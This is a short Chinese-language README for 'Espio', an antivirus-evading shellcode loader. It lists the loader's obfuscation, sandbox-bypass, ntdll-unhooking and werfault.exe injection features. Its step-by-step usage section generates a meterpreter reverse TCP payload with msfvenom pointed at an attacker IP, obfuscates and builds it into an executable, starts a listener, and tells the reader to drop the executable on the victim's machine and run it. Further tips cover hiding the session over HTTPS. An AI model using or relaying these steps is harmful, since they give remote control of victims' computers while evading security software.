• 混淆 - 使用随机生成的密钥进行 base64 编码和 XOR 加密。

• Sandbox Bypass - 自定义休眠功能。

• DLL Unhooking - ntdll.dll 的完全脱钩

• 进程注入 - 将有效负载注入 werfault.exe

用法

1.克隆存储库：

git clone https://github.com/Konis-Bros/Espio.git

2.生成Shell代码。在此演示中，我们将在 kali 机器中使用 msfvenom：

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<Attacker IP> LPORT=1337 -f raw -o shellcode

3.将shellcode放入克隆的仓库中，使用obfuscator.py工具进行混淆：

python3 obfuscator.py shellcode

注意：然后我们的 shellcode 使用key.bin密钥被混淆为obfuscatedPayload.bin并保存在 loader/Espio 中。

4.打开 loader/Espio.sln，Visual Studio 解决方案文件。

5.构建项目。请注意，可执行文件将位于 loader/x64/Debug/Espio.exe。

6.在攻击者的机器上，侦听定义端口上的 TCP 连接。在我们的例子中，在端口 1337 上运行 metasploit 的 multi/handler。

7.将可执行文件放到受害者的机器上并运行它。

建议

• 在第 2 步和第 6 步中，通过 HTTPS 创建 meterpreter 会话。有关详细信息，请参阅Meterpreter HTTP/HTTPS 通信。
• 在第 5 步中，将构建配置从 Debug 更改为 Release。请注意，可执行文件现在位于 loader/x64/Release/Espio.exe。

小红伞 Prime：

AV

项目地址：

https://github.com/Konis-Bros/Espio